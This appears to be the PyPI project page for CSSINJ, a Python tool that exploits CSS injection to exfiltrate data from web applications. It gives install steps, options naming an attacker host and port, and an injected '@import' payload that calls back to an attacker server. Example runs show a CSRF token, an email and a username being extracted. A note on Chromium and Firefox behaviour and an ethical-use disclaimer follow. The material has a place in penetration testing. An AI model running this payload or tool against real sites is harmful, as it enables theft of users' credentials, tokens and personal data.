A python tools to exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications.
Project description
CSSINJ
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
About
CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.
Installation
To install and set up CSSINJ from Source, run the following commands:
git clone https://github.com/DonAsako/CSSinj.git
cd CSSinj
python3 -m venv venv
source venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade build
python3 -m build
python3 -m pip install .
Now you’re ready to use CSSINJ! 🎯
Usage
python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]
Options
| Option | Description |
|---|---|
-h, --help |
Show help message and exit |
-H, --hostname |
Attacker hostname or IP address |
-p, --port |
Port number of the attacker |
-e, --element |
HTML element to extract specific data |
-a, --attribut |
Specify an element Attribute Selector for exfiltration |
-d, --details |
Show detailed logs of the exfiltration process, including extracted data |
-m, --method |
Specify the type of exfiltration (recusive or font-face) |
-o, --output |
File to store the exfiltrated data in JSON format |
Example
Victim's View :
<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
@import url('//localhost:5005/start');
</style>
...
Recursive attack
Using a specific HTML identifier :
~ python3 CSSINJ.py inject -H 127.0.0.1 -p 5005 -e input
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49] ✅ [1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49] ✅ [1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49] ✅ [1] - The value exfiltrated from input is : admin
Using a specific CSS attribute selector and a generic HTML identifier:
~ python3 CSSINJ.py -H 127.0.0.1 -p 5005 -e * -a src
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49] ✅ [1] - The src exfiltrated from * is : XXXXXXXXXXX.XX
Font-face attack
~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-05-21 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] 🌐 Connection from 127.0.0.1
[2025-05-21 03:06:49] ⚙️ ID : 1
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 :
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : !
Browser-Specific Behavior
The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:
-
Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.
-
Firefox, however, handles @import differently:
- Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
- As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
- This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.
This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.
Todo
-
General :
- Add error Handler
- File error Handler
- Add test
- Edit Terminal
- Add error Handler
-
Injection :
- Add injection parameters
- Add an option to save results to a file
- Allow multiple CSS selectors for simultaneous extraction
- Add g all of the page
- Refract cssinjector.py
- Add timeout
Disclaimer
This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.
Author
CSSINJ was developed by Asako.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file cssinj-0.1.0.tar.gz.
File metadata
- Download URL: cssinj-0.1.0.tar.gz
- Upload date:
- Size: 47.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
b7c0d2728f87913be5e73fe514162ac28cdae6f5a38e720338eb3bc4108667cd
|
|
| MD5 |
5988b7ed155ad793aedfe0d445339af3
|
|
| BLAKE2b-256 |
5849c049f2560ee4462de99715f5b39f4cd90b318dd3e064d9b0b2546882387b
|
File details
Details for the file cssinj-0.1.0-py3-none-any.whl.
File metadata
- Download URL: cssinj-0.1.0-py3-none-any.whl
- Upload date:
- Size: 35.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
d0f7c3462e28574eae9651872565aeb20fba5e2b901444938c66f04c19576da1
|
|
| MD5 |
08e0f0e48f98cc7ffb89bd32d9a4875a
|
|
| BLAKE2b-256 |
c6aa60409fa2d3f9a07eb6ca895c23c1e69f3abbfb7087c8428520f19a39344d
|
